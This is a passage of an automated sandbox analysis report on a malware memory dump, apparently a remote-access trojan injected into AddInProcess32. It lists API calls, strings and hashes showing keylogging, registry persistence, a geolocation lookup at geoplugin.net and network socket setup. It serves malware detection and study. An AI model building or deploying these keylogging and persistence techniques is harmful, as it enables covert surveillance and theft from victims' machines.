                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 1323 41a51b-41a55a call 401faa call 43a88c InternetOpenW InternetOpenUrlW 1328 41a55c-41a57d InternetReadFile 1323->1328 1329 41a5a3-41a5a6 1328->1329 1330 41a57f-41a59f call 401f86 call 402f08 call 401eea 1328->1330 1331 41a5a8-41a5aa 1329->1331 1332 41a5ac-41a5b9 InternetCloseHandle * 2 call 43a887 1329->1332 1330->1329 1331->1328 1331->1332 1337 41a5be-41a5c8 1332->1337
                                                                                                        APIs
                                                                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                        Strings
                                                                                                        • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                        • String ID: http://geoplugin.net/json.gp
                                                                                                        • API String ID: 3121278467-91888290
                                                                                                        • Opcode ID: 36e01e55f813b3e587d73a157094a3d7c5a29764a6c694396ca7ce848afa256e
                                                                                                        • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                        • Opcode Fuzzy Hash: 36e01e55f813b3e587d73a157094a3d7c5a29764a6c694396ca7ce848afa256e
                                                                                                        • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                          • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                          • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                          • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                        • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                        • API String ID: 1866151309-2070987746
                                                                                                        • Opcode ID: 45f2cc7f8136337c42f5944fd7cecdfc8e179c6ee647a5e14532dc020d3e2dac
                                                                                                        • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                        • Opcode Fuzzy Hash: 45f2cc7f8136337c42f5944fd7cecdfc8e179c6ee647a5e14532dc020d3e2dac
                                                                                                        • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 1365 409d97-409da7 1366 409e44-409e47 1365->1366 1367 409dad-409daf 1365->1367 1368 409db2-409dd8 call 401e07 CreateFileW 1367->1368 1371 409e18 1368->1371 1372 409dda-409de8 GetFileSize 1368->1372 1375 409e1b-409e1f 1371->1375 1373 409dea 1372->1373 1374 409e0f-409e16 CloseHandle 1372->1374 1377 409df4-409dfb 1373->1377 1378 409dec-409df2 1373->1378 1374->1375 1375->1368 1376 409e21-409e24 1375->1376 1376->1366 1379 409e26-409e2d 1376->1379 1380 409e04-409e09 Sleep 1377->1380 1381 409dfd-409dff call 40a7f0 1377->1381 1378->1374 1378->1377 1379->1366 1382 409e2f-409e3f call 4082dc call 4098a5 1379->1382 1380->1374 1381->1380 1382->1366
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                        • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                                                                        • String ID: `AG
                                                                                                        • API String ID: 1958988193-3058481221
                                                                                                        • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                        • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                        • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                        • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 1387 4126d2-4126e9 RegCreateKeyA 1388 412722 1387->1388 1389 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1387->1389 1391 412724-412730 call 401eea 1388->1391 1389->1391
                                                                                                        APIs
                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                        • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                        • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValue
                                                                                                        • String ID: HgF$pth_unenc
                                                                                                        • API String ID: 1818849710-3662775637
                                                                                                        • Opcode ID: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                                                        • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                        • Opcode Fuzzy Hash: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                                                        • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                                                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread$LocalTimewsprintf
                                                                                                        • String ID: Offline Keylogger Started
                                                                                                        • API String ID: 465354869-4114347211
                                                                                                        • Opcode ID: aa7dad158495ae52b0f3a751208c625103e585d813ac465631ead48c5b0ce597
                                                                                                        • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                        • Opcode Fuzzy Hash: aa7dad158495ae52b0f3a751208c625103e585d813ac465631ead48c5b0ce597
                                                                                                        • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                        APIs
                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                        • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValue
                                                                                                        • String ID: TUF
                                                                                                        • API String ID: 1818849710-3431404234
                                                                                                        • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                        • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                        • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                        • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                        APIs
                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3360349984-0
                                                                                                        • Opcode ID: f4aaeb2080a592ab8258315a72005a76cc9d26b97f258a459caff36ba9a30bf0
                                                                                                        • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                        • Opcode Fuzzy Hash: f4aaeb2080a592ab8258315a72005a76cc9d26b97f258a459caff36ba9a30bf0
                                                                                                        • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                        • CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandlePointerWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3604237281-0
                                                                                                        • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                        • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                        • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                        • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CountEventTick
                                                                                                        • String ID: >G
                                                                                                        • API String ID: 180926312-1296849874
                                                                                                        • Opcode ID: e43420cbb1104f7685dac86efea1cb921a074aae9cf36a541284d59b132dd712
                                                                                                        • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                        • Opcode Fuzzy Hash: e43420cbb1104f7685dac86efea1cb921a074aae9cf36a541284d59b132dd712
                                                                                                        • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                        APIs
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                        • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateErrorLastMutex
                                                                                                        • String ID: (CG
                                                                                                        • API String ID: 1925916568-4210230975
                                                                                                        • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                        • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                        • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                        • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                        • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3677997916-0
                                                                                                        • Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                        • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                        • Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                        • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                        • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3677997916-0
                                                                                                        • Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                        • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                        • Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                        • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                        • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3677997916-0
                                                                                                        • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                        • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                        • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                        • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                        • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3677997916-0
                                                                                                        • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                        • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                        • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                        • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen
                                                                                                        • String ID: xAG
                                                                                                        • API String ID: 176396367-2759412365
                                                                                                        • Opcode ID: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                                        • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                                        • Opcode Fuzzy Hash: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                                        • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                                        APIs
                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                        • String ID: @
                                                                                                        • API String ID: 1890195054-2766056989
                                                                                                        • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                        • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                        • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                        • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                        APIs
                                                                                                        • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                          • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateEventStartupsocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 1953588214-0
                                                                                                        • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                        • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                        • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                        • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                          • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                        • String ID:
                                                                                                        • API String ID: 3476068407-0
                                                                                                        • Opcode ID: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                        • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                        • Opcode Fuzzy Hash: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                        • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                                        APIs
                                                                                                        • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$ForegroundText
                                                                                                        • String ID:
                                                                                                        • API String ID: 29597999-0
                                                                                                        • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                        • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                                                                        • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                        • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                                                                        APIs
                                                                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                          • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                          • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                          • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                          • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                          • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 1170566393-0
                                                                                                        • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                        • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                                                        • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                        • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                                                        APIs
                                                                                                          • Part of subcall function 00448706: RtlAllocateHeap.NTDLL(00000008,0000000A,00000000,?,00446F74,00000001,00000364,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000,?), ref: 00448747
                                                                                                        • _free.LIBCMT ref: 0044EF21
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
